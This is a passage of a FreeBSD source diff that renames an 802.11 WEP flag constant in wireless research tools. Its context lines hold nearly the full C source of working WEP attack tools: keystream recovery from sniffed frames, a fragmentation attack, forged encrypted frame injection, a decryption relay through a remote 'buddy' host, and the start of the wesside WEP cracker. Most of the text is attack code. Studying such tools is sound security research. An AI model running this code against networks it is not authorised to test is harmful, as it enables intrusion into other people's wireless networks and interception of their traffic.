OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include "w00t.h" static char *known_pt_arp = "\xAA\xAA\x03\x00\x00\x00\x08\x06"; static char *known_pt_ip = "\xAA\xAA\x03\x00\x00\x00\x08\x00"; static int known_pt_len = 8; enum { S_START = 0, S_SEND_FRAG, S_WAIT_ACK, S_WAIT_RELAY }; struct params { int tx; int rx; char mac[6]; char ap[6]; char prga[2048]; int prga_len; char iv[3]; char *fname; struct timeval last; char packet[2048]; int packet_len; int state; char data[2048]; char *data_ptr; int data_len; int data_try; int mtu; int seq; int frag; int tap; }; void usage(char *p) { printf("Usage: %s \n" "-h\thelp\n" "-b\t\n" "-t\t\n" , p); exit(0); } void load_prga(struct params *p) { int fd; int rd; fd = open(p->fname, O_RDONLY); if (fd == -1) { p->prga_len = 0; return; } rd = read(fd, p->iv, 3); if (rd == -1) err(1, "read()"); if (rd != 3) { printf("Short read\n"); exit(1); } rd = read(fd, p->prga, sizeof(p->prga)); if (rd == -1) err(1, "read()"); p->prga_len = rd; printf("Loaded %d PRGA from %s\n", p->prga_len, p->fname); close(fd); } void save_prga(struct params *p) { int fd; int rd; fd = open(p->fname, O_WRONLY | O_CREAT, 0644); if (fd == -1) err(1, "open()"); rd = write(fd, p->iv, 3); if (rd == -1) err(1, "write()"); if (rd != 3) { printf("Short write\n"); exit(1); } rd = write(fd, p->prga, p->prga_len); if (rd == -1) err(1, "write()"); if (rd != p->prga_len) { printf("Wrote %d/%d\n", rd, p->prga_len); exit(1); } close(fd); printf("Got %d bytes of PRGA\n", p->prga_len); } int is_arp(struct ieee80211_frame *wh, int len) { /* XXX */ if (len > (sizeof(*wh) + 4 + 4 + 39)) return 0; return 1; } void get_prga(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; char *bssid; char *ptr; char *known_pt; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; if (!frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) return; if (is_arp(wh, rc)) known_pt = known_pt_arp; else known_pt = known_pt_ip; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) bssid = wh->i_addr1; else bssid = wh->i_addr2; if (memcmp(p->ap, bssid, 6) != 0) return; - if (!(wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!(wh->i_fc[1] & 
IEEE80211_FC1_PROTECTED)) { printf("Packet not WEP!\n"); return; } ptr = (char*) (wh+1); memcpy(p->iv, ptr, 3); ptr += 4; rc -= sizeof(wh) + 4; assert(rc >= known_pt_len); for (rc = 0; rc < known_pt_len; rc++) { p->prga[rc] = known_pt[rc] ^ (*ptr); ptr++; } p->prga_len = rc; save_prga(p); } void start(struct params *p) { int len; len = p->prga_len; len -= 4; assert(len > 0); len *= 4; if (len > p->mtu) len = p->mtu; p->data_len = len; memset(p->data, 0, p->data_len); memcpy(p->data, "\xaa\xaa\x03\x00\x00\x00\x08\x06", 8); p->data_ptr = p->data; p->data_try = 0; p->seq++; p->frag = 0; p->state = S_SEND_FRAG; } void send_packet(struct params *p) { int rc; struct ieee80211_frame *wh; rc = inject(p->tx, p->packet, p->packet_len); if (rc == -1) err(1, "inject()"); if (rc != p->packet_len) { printf("Wrote %d/%d\n", rc, p->packet_len); exit(1); } p->data_try++; wh = (struct ieee80211_frame*) p->packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } void send_frag(struct params *p) { struct ieee80211_frame *wh; int dlen, rem; int last = 0; short *seqp; char *ptr; uLong *pcrc; uLong crc = crc32(0L, Z_NULL, 0); int i; memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame*) p->packet; /* calculate how much data we need to copy */ dlen = p->prga_len - 4; rem = p->data_ptr - p->data; rem = p->data_len - rem; if (rem <= dlen) { dlen = rem; last = 1; } /* 802.11 */ wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; if (!last) wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; wh->i_dur[0] = 0x69; wh->i_dur[1] = 0x00; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memset(wh->i_addr3, 0xff, 6); seqp = (short*) wh->i_seq; *seqp = seqfn(p->seq, p->frag); p->frag++; /* IV & data */ ptr = (char*) (wh+1); memcpy(ptr, p->iv, 3); ptr += 4; memcpy(ptr, p->data_ptr, dlen); /* crc */ crc = crc32(crc, ptr, dlen); pcrc = (uLong*) (ptr+dlen); *pcrc = crc; /* wepify */ for (i = 0; i < dlen+4; i++) ptr[i] = ptr[i] ^ p->prga[i]; /* prepare for next frag */ p->packet_len = sizeof(*wh) + 4 + dlen + 4; p->data_ptr += dlen; #if 0 printf("Sening %sfrag [%d/%d] [len=%d]\n", last ? 
"last " : "", p->seq, p->frag, dlen); #endif if (last) { p->data_ptr = p->data; p->frag = 0; p->seq++; } /* send it off */ send_packet(p); p->state = S_WAIT_ACK; } void wait_ack(struct params *p) { struct timeval now; int el; int tout = 10*1000; fd_set fds; int rc; char buf[4096]; struct ieee80211_frame *wh; if (gettimeofday(&now, NULL) == -1) err(1, "gettimeofday()"); /* check for timeout */ el = elapsed(&p->last, &now); if (el >= tout) { if (p->data_try >= 3) { #if 0 printf("Re-sending whole lot\n"); #endif p->state = S_START; return; } #if 0 printf("Re-sending frag\n"); #endif send_packet(p); el = 0; } el = tout - el; now.tv_sec = el/1000/1000; now.tv_usec = el - now.tv_sec*1000*1000; FD_ZERO(&fds); FD_SET(p->rx, &fds); if (select(p->rx+1, &fds, NULL, NULL, &now) == -1) err(1, "select()"); if (!FD_ISSET(p->rx, &fds)) return; /* grab ack */ rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; if (!frame_type(wh, IEEE80211_FC0_TYPE_CTL, IEEE80211_FC0_SUBTYPE_ACK)) return; if (memcmp(p->mac, wh->i_addr1, 6) != 0) return; /* wait for relay */ if (p->frag == 0) { p->state = S_WAIT_RELAY; if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } else p->state = S_SEND_FRAG; } void wait_relay(struct params *p) { int tout = 20*1000; struct timeval now; int el; fd_set fds; int rc; char buf[4096]; struct ieee80211_frame *wh; char *ptr; uLong crc = crc32(0L, Z_NULL, 0); uLong *pcrc; if (gettimeofday(&now, NULL) == -1) err(1, "gettimeofday()"); el = elapsed(&p->last, &now); if (el >= tout) { #if 0 printf("No relay\n"); #endif p->state = S_START; return; } el = tout - el; now.tv_sec = el/1000/1000; now.tv_usec = el - now.tv_sec*1000*1000; FD_ZERO(&fds); FD_SET(p->rx, &fds); if (select(p->rx+1, &fds, NULL, NULL, &now) == -1) err(1, "select()"); if (!FD_ISSET(p->rx, &fds)) return; /* get relay */ rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; if (!frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) return; if (memcmp(wh->i_addr2, p->ap, 6) != 0) return; if (memcmp(wh->i_addr3, p->mac, 6) != 0) return; if (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) != 0) return; /* lends different due to padding? 
*/ if ( (rc - sizeof(*wh) - 8) != p->data_len) return; /* grab new PRGA */ assert(p->data_len >= p->prga_len); ptr = (char*) (wh+1); memcpy(p->iv, ptr, 3); ptr += 4; crc = crc32(crc, p->data, p->data_len); pcrc = (uLong*) &p->data[p->data_len]; /* XXX overflow ph33r */ *pcrc = crc; for (rc = 0; rc < p->data_len+4; rc++) p->prga[rc] = p->data[rc] ^ ptr[rc]; p->prga_len = p->data_len+4; p->state = S_START; save_prga(p); } void get_more_prga(struct params *p) { switch (p->state) { case S_START: start(p); break; case S_SEND_FRAG: send_frag(p); break; case S_WAIT_ACK: wait_ack(p); break; case S_WAIT_RELAY: wait_relay(p); break; default: printf("WTF %d\n", p->state); abort(); break; } } void read_tap(struct params *p) { int offset; char *ptr; struct ieee80211_frame *wh; int rc; char dst[6]; short *seq; uLong *pcrc; uLong crc = crc32(0L, Z_NULL, 0); memset(p->packet, 0, sizeof(p->packet)); offset = sizeof(*wh) + 4 + 8 - 14; rc = sizeof(p->packet) - offset; ptr = &p->packet[offset]; rc = read(p->tap, ptr, rc); if (rc == -1) err(1, "read()"); memcpy(dst, ptr, sizeof(dst)); wh = (struct ieee80211_frame*) p->packet; wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, dst, 6); seq = (short*) wh->i_seq; *seq = seqfn(p->seq++, 0); /* data */ ptr = (char*) (wh+1); memcpy(ptr, p->iv, 3); ptr += 3; *ptr++ = 0; memcpy(ptr, "\xAA\xAA\x03\x00\x00\x00", 6); rc -= 14; rc += 8; crc = crc32(crc, ptr, rc); pcrc = (uLong*) (ptr+rc); *pcrc = crc; rc += 4; assert(p->prga_len >= rc); /* wepify */ for (offset = 0; offset < rc; offset++) ptr[offset] ^= p->prga[offset]; p->packet_len = sizeof(*wh) + 4 + rc; p->data_try = 0; send_packet(p); p->state = S_WAIT_ACK; } /* XXX */ void wait_tap_ack(struct params *p) { p->data_try = 0; p->frag = 1; wait_ack(p); if (p->state == S_SEND_FRAG) { #if 0 printf("Got ACK\n"); #endif p->state = S_START; } } void transmit(struct params *p) { switch (p->state) { case S_START: read_tap(p); break; case S_WAIT_ACK: wait_tap_ack(p); break; default: printf("wtf %d\n", p->state); abort(); break; } } int main(int argc, char *argv[]) { struct params p; char *iface = "wlan0"; char *tap = "tap0"; int ch; memset(&p, 0, sizeof(p)); p.fname = "prga.log"; memcpy(p.mac, "\x00\x00\xde\xfa\xce\x0d", 6); p.state = S_START; p.mtu = 1500; p.seq = getpid(); while ((ch = getopt(argc, argv, "hb:t:")) != -1) { switch (ch) { case 'b': if (str2mac(p.ap, optarg) == -1) { printf("Can't parse BSSID\n"); exit(1); } break; case 't': tap = optarg; break; case 'h': default: usage(argv[0]); break; } } /* init */ if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); printf("Obtaining PRGA\n"); /* make sure we got some prga */ load_prga(&p); while (p.prga_len == 0) get_prga(&p); /* lets grab some more */ while (p.prga_len < p.mtu) get_more_prga(&p); /* transmit */ p.state = S_START; while (1) transmit(&p); exit(0); } diff --git a/tools/tools/net80211/w00t/redir/redir.c b/tools/tools/net80211/w00t/redir/redir.c index 9be363e2f0a3..ad574ea9a251 100644 --- a/tools/tools/net80211/w00t/redir/redir.c +++ b/tools/tools/net80211/w00t/redir/redir.c @@ -1,709 +1,709 @@ /*- * Copyright (c) 2006, Andrea Bittau * 
All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "w00t.h" enum { S_START = 0, S_WAIT_ACK, S_WAIT_BUDDY }; struct queue { struct ieee80211_frame *wh; int len; int id; char *buf; int live; struct queue *next; }; struct params { int rx; int tx; int s; int port; int tap; char mac[6]; char ap[6]; char rtr[6]; struct in_addr src; struct in_addr dst; char prga[2048]; int prga_len; char iv[3]; char *fname; int state; struct queue *q; char packet[2048]; int packet_len; struct timeval last; int id; int data_try; int seq; int frag; char buddy_data[2048]; int buddy_got; }; void load_prga(struct params *p) { int fd; int rd; fd = open(p->fname, O_RDONLY); if (fd == -1) { p->prga_len = 0; return; } rd = read(fd, p->iv, 3); if (rd == -1) err(1, "read()"); if (rd != 3) { printf("Short read\n"); exit(1); } rd = read(fd, p->prga, sizeof(p->prga)); if (rd == -1) err(1, "read()"); p->prga_len = rd; printf("Loaded %d PRGA from %s\n", p->prga_len, p->fname); close(fd); } int wanted(struct params *p, struct ieee80211_frame *wh, int len) { char *bssid, *sa; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { bssid = wh->i_addr1; sa = wh->i_addr2; } else { bssid = wh->i_addr2; sa = wh->i_addr3; } if (memcmp(bssid, p->ap, 6) != 0) return 0; - if (!(wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!(wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) { printf("Got non WEP packet...\n"); return 0; } /* my own shit */ if (memcmp(p->mac, sa, 6) == 0) return 0; return 1; } void enque(struct params *p, char **buf, struct ieee80211_frame *wh, int len) { struct queue *q = p->q; int qlen = 0; char *ret = NULL; struct queue *last = NULL; /* find a slot */ while (q) { if (q->live) qlen++; else { /* recycle */ ret = q->buf; break; } last = q; q = q->next; } /* need to create slot */ if (!q) { q = (struct queue*) malloc(sizeof(*q)); if (!q) err(1, "malloc()"); memset(q, 0, sizeof(*q)); /* insert */ if (!p->q) p->q = q; else { assert(last); last->next = q; } } q->live = 1; q->buf = *buf; q->len = len; q->wh = wh; q->id = p->id++; qlen++; if (qlen > 5) printf("Enque. 
Size: %d\n", qlen); *buf = ret; } /********** RIPPED ************/ unsigned short in_cksum (unsigned short *ptr, int nbytes) { register long sum; u_short oddbyte; register u_short answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) & oddbyte) = *(u_char *) ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } /************** ************/ void send_packet(struct params *p) { int rc; struct ieee80211_frame *wh; rc = inject(p->tx, p->packet, p->packet_len); if (rc == -1) err(1, "inject()"); if (rc != p->packet_len) { printf("Wrote %d/%d\n", rc, p->packet_len); exit(1); } p->data_try++; wh = (struct ieee80211_frame*) p->packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } void send_header(struct params *p, struct queue *q) { struct ieee80211_frame *wh; short *pseq; char *ptr; struct ip *ih; int len, i; uLong crc = crc32(0L, Z_NULL, 0); uLong *pcrc; /* 802.11 */ memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame *) p->packet; wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->rtr, 6); pseq = (short*) wh->i_seq; p->frag = 0; p->seq++; *pseq = seqfn(p->seq, p->frag++); /* IV */ ptr = (char*) (wh+1); memcpy(ptr, p->iv, 3); ptr += 4; /* LLC/SNAP */ memcpy(ptr, "\xAA\xAA\x03\x00\x00\x00\x08\x00", 8); /* IP */ ih = (struct ip*) (ptr+8); ih->ip_v = 4; ih->ip_hl = 5; len = q->len - sizeof(*wh) - 4 - 4 + 20; ih->ip_len = htons(len); ih->ip_id = htons(q->id); ih->ip_ttl = 69; ih->ip_p = 0; ih->ip_src.s_addr = p->src.s_addr; ih->ip_dst.s_addr = p->dst.s_addr; ih->ip_sum = in_cksum((unsigned short*)ih, 20); /* ICV */ len = 8 + 20; crc = crc32(crc, ptr, len); pcrc = (uLong*) (ptr+len); *pcrc = crc; /* wepify */ for (i = 0; i < len + 4; i++) ptr[i] ^= p->prga[i]; p->packet_len = sizeof(*wh) + 4 + len + 4; p->data_try = 0; send_packet(p); } void send_queue(struct params *p) { struct queue *q = p->q; assert(q); assert(q->live); send_header(p, q); p->state = S_WAIT_ACK; } void send_data(struct params *p) { struct ieee80211_frame *wh; short *seq; struct queue *q = p->q; char *dst, *src; int len; assert(q); /* 802.11 */ memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame*) p->packet; wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->rtr, 6); seq = (short*) wh->i_seq; *seq = seqfn(p->seq, p->frag++); /* data */ dst = (char*) (wh+1); src = (char*) (q->wh+1); len = q->len - sizeof(*wh); memcpy(dst, src, len); p->packet_len = sizeof(*wh) + len; p->data_try = 0; send_packet(p); } void got_ack(struct params *p) { switch (p->frag) { case 1: send_data(p); break; case 2: p->state = S_WAIT_BUDDY; p->data_try = 69; break; } } void read_wifi(struct params *p) { static char *buf = 0; static int buflen = 4096; struct ieee80211_frame *wh; int rc; if (!buf) { buf = (char*) malloc(buflen); if (!buf) err(1, "malloc()"); } rc = sniff(p->rx, buf, buflen); if (rc == -1) err(1, 
"sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; /* acks */ if (frame_type(wh, IEEE80211_FC0_TYPE_CTL, IEEE80211_FC0_SUBTYPE_ACK) && (memcmp(p->mac, wh->i_addr1, 6) == 0)) { got_ack(p); return; } /* data */ if (frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) { if (!wanted(p, wh, rc)) return; enque(p, &buf, wh, rc); if (p->state == S_START) send_queue(p); return; } } int connect_buddy(struct params *p) { struct sockaddr_in s_in; memset(&s_in, 0, sizeof(s_in)); s_in.sin_family = PF_INET; s_in.sin_port = htons(p->port); s_in.sin_addr.s_addr = p->dst.s_addr; if ((p->s = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) return -1; if (connect(p->s, (struct sockaddr*) &s_in, sizeof(s_in)) == -1) return -1; return 0; } void buddy_reset(struct params *p) { p->buddy_got = 0; if (connect_buddy(p) == -1) err(1, "connect_buddy()"); } int buddy_get(struct params *p, int len) { int rd; rd = recv(p->s, &p->buddy_data[p->buddy_got], len, 0); if (rd <= 0) { buddy_reset(p); return 0; } p->buddy_got += rd; return rd == len; } void read_buddy_head(struct params *p) { int rem; rem = 4 - p->buddy_got; if (!buddy_get(p, rem)) return; } void read_buddy_data(struct params *p) { unsigned short *ptr = (unsigned short*) p->buddy_data; int id, len, rem; struct queue *q = p->q; struct queue *last = p->q; char mac[12]; struct iovec iov[2]; id = ntohs(*ptr++); len = ntohs(*ptr++); rem = len + 4 - p->buddy_got; assert(rem > 0); if (!buddy_get(p, rem)) return; /* w00t, got it */ #if 0 printf("id=%d len=%d\n", id, len); #endif p->buddy_got = 0; /* feedback loop bullshit */ if (!q) return; if (!q->live) return; /* sanity chex */ if (q->id != id) { printf("Diff ID\n"); return; } rem = q->len - sizeof(*q->wh) - 4 - 4; if (rem != len) { printf("Diff len\n"); return; } /* tap */ if (q->wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { memcpy(mac, q->wh->i_addr3, 6); memcpy(&mac[6], q->wh->i_addr2, 6); } else { memcpy(mac, q->wh->i_addr1, 6); memcpy(&mac[6], q->wh->i_addr3, 6); } iov[0].iov_base = mac; iov[0].iov_len = sizeof(mac); iov[1].iov_base = (char*)ptr + 8 - 2; iov[1].iov_len = len - 8 + 2; rem = writev(p->tap, iov, sizeof(iov)/sizeof(struct iovec)); if (rem == -1) err(1, "writev()"); if (rem != (14+(len-8))) { printf("Short write %d\n", rem); exit(1); } /* deque */ q->live = 0; if (q->next) { p->q = q->next; while (last) { if (!last->next) { last->next = q; q->next = 0; break; } last = last->next; } } /* drain queue */ p->state = S_START; if (p->q->live) send_queue(p); } void read_buddy(struct params *p) { if (p->buddy_got < 4) read_buddy_head(p); else read_buddy_data(p); } void own(struct params *p) { struct timeval tv; struct timeval *to = NULL; fd_set fds; int max; int tout_ack = 10*1000; int tout_buddy = 2*1000*1000; int tout = (p->state == S_WAIT_BUDDY) ? tout_buddy : tout_ack; if (p->state == S_WAIT_ACK || p->state == S_WAIT_BUDDY) { int el; /* check timeout */ if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); el = elapsed(&p->last, &tv); /* timeout */ if (el >= tout) { if (p->data_try > 3) { p->state = S_START; return; } else { send_packet(p); el = 0; } } el = tout - el; tv.tv_sec = el/1000/1000; tv.tv_usec = el - tv.tv_sec*1000*1000; to = &tv; } FD_ZERO(&fds); FD_SET(p->rx, &fds); FD_SET(p->s, &fds); max = (p->rx > p->s) ? 
p->rx : p->s; if (select(max+1, &fds, NULL, NULL, to) == -1) err(1, "select()"); if (FD_ISSET(p->rx, &fds)) read_wifi(p); if (FD_ISSET(p->s, &fds)) read_buddy(p); } void usage(char *name) { printf("Usage %s \n" "-h\thelp\n" "-d\t\n" "-p\t\n" "-b\t\n" "-t\t\n" "-r\t\n" "-s\t\n" , name); exit(1); } int main(int argc, char *argv[]) { struct params p; char *iface = "wlan0"; char *tap = "tap0"; int ch; memset(&p, 0, sizeof(p)); memcpy(p.mac, "\x00\x00\xde\xfa\xce\xd", 6); p.fname = "prga.log"; p.seq = getpid(); while ((ch = getopt(argc, argv, "hd:p:b:t:r:s:")) != -1) { switch (ch) { case 's': if (!inet_aton(optarg, &p.src)) { printf("Can't parse src IP\n"); exit(1); } break; case 'r': if (str2mac(p.rtr, optarg) == -1) { printf("Can't parse rtr MAC\n"); exit(1); } break; case 't': tap = optarg; break; case 'b': if (str2mac(p.ap, optarg) == -1) { printf("Can't parse BSSID\n"); exit(1); } break; case 'd': if (!inet_aton(optarg, &p.dst)) { printf("Can't parse IP\n"); exit(1); } break; case 'p': p.port = atoi(optarg); break; case 'h': default: usage(argv[0]); break; } } load_prga(&p); assert(p.prga_len > 60); if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); if (connect_buddy(&p) == -1) err(1, "connect_buddy()"); p.state = S_START; while (1) own(&p); exit(0); } diff --git a/tools/tools/net80211/wesside/wesside/wesside.c b/tools/tools/net80211/wesside/wesside/wesside.c index 76f539eeab8a..5d63dc421990 100644 --- a/tools/tools/net80211/wesside/wesside/wesside.c +++ b/tools/tools/net80211/wesside/wesside/wesside.c @@ -1,2814 +1,2815 @@ /* * wep owner by sorbo * Aug 2005 * * XXX GENERAL: I DON'T CHECK FOR PACKET LENGTHS AND STUFF LIKE THAT and buffer * overflows. this whole thing is experimental n e way. 
* * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "aircrack-ptw-lib.h" #define FIND_VICTIM 0 #define FOUND_VICTIM 1 #define SENDING_AUTH 2 #define GOT_AUTH 3 #define SPOOF_MAC 4 #define SENDING_ASSOC 5 #define GOT_ASSOC 6 int state = 0; struct timeval arpsend; struct tx_state { int waiting_ack; struct timeval tsent; int retries; unsigned int psent; } txstate; struct chan_info { int s; struct ieee80211req ireq; int chan; } chaninfo; struct victim_info { char* ssid; int chan; char bss[6]; } victim; struct frag_state { struct ieee80211_frame wh; unsigned char* data; int len; unsigned char* ptr; int waiting_relay; struct timeval last; } fragstate; struct prga_info { unsigned char* prga; unsigned int len; unsigned char iv[3]; } prgainfo; struct decrypt_state { unsigned char* cipher; int clen; struct prga_info prgainfo; struct frag_state fragstate; } decryptstate; struct wep_log { unsigned int packets; unsigned int rate; int fd; unsigned char iv[3]; } weplog; #define LINKTYPE_IEEE802_11 105 #define TCPDUMP_MAGIC 0xA1B2C3D4 unsigned char* floodip = 0; unsigned short floodport = 6969; unsigned short floodsport = 53; unsigned char* netip = 0; int netip_arg = 0; int max_chan = 11; unsigned char* rtrmac = 0; unsigned char mymac[] = "\x00\x00\xde\xfa\xce\x0d"; unsigned char myip[16] = "192.168.0.123"; int bits = 0; int ttl_val = 0; PTW_attackstate *ptw; unsigned char *victim_mac = 0; int ack_timeout = 100*1000; #define ARPLEN (8+ 8 + 20) unsigned char arp_clear[] = "\xAA\xAA\x03\x00\x00\x00\x08\x06"; unsigned char ip_clear[] = "\xAA\xAA\x03\x00\x00\x00\x08\x00"; #define S_LLC_SNAP "\xAA\xAA\x03\x00\x00\x00" #define S_LLC_SNAP_ARP (S_LLC_SNAP "\x08\x06") #define S_LLC_SNAP_IP (S_LLC_SNAP "\x08\x00") #define MCAST_PREF "\x01\x00\x5e\x00\x00" #define WEP_FILE "wep.cap" #define KEY_FILE "key.log" #define PRGA_FILE "prga.log" unsigned int min_prga = 128; /* * When starting aircrack we try first to use a * local copy, falling back to where the installed * version is expected. * XXX builtin pathnames */ #define CRACK_LOCAL_CMD "../aircrack/aircrack" #define CRACK_INSTALL_CMD "/usr/local/bin/aircrack" #define INCR 10000 int thresh_incr = INCR; #define MAGIC_TTL_PAD 69 int crack_dur = 60; int wep_thresh = INCR; int crack_pid = 0; struct timeval crack_start; struct timeval real_start; /* linksys does this. The hardware pads small packets. 
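* An un-padded encrypted ARP reply decrypts to a 36-byte payload (ARPLEN above);
* on such hardware it shows up padded to 54 bytes instead, so stuff_for_us()
* accepts either length when waiting for the router's ARP reply.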
*/ #define PADDED_ARPLEN 54 #define PRGA_LEN (1500-14-20-8) unsigned char inet_clear[8+20+8+PRGA_LEN+4]; #define DICT_PATH "dict" #define TAP_DEV "/dev/tap3" unsigned char tapdev[16]; unsigned char taptx[4096]; unsigned int taptx_len = 0; int tapfd = -1; /********** RIPPED ************/ unsigned short in_cksum (unsigned short *ptr, int nbytes) { register long sum; u_short oddbyte; register u_short answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) & oddbyte) = *(u_char *) ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } /************** ************/ unsigned int udp_checksum(unsigned char *stuff, int len, struct in_addr *sip, struct in_addr *dip) { unsigned char *tmp; struct ippseudo *ph; tmp = (unsigned char*) malloc(len + sizeof(struct ippseudo)); if(!tmp) err(1, "malloc()"); ph = (struct ippseudo*) tmp; memcpy(&ph->ippseudo_src, sip, 4); memcpy(&ph->ippseudo_dst, dip, 4); ph->ippseudo_pad = 0; ph->ippseudo_p = IPPROTO_UDP; ph->ippseudo_len = htons(len); memcpy(tmp + sizeof(struct ippseudo), stuff, len); return in_cksum((unsigned short*)tmp, len+sizeof(struct ippseudo)); } void time_print(char* fmt, ...) { va_list ap; char lame[1024]; time_t tt; struct tm *t; va_start(ap, fmt); vsnprintf(lame, sizeof(lame), fmt, ap); va_end(ap); tt = time(NULL); if (tt == (time_t)-1) { perror("time()"); exit(1); } t = localtime(&tt); if (!t) { perror("localtime()"); exit(1); } printf("[%.2d:%.2d:%.2d] %s", t->tm_hour, t->tm_min, 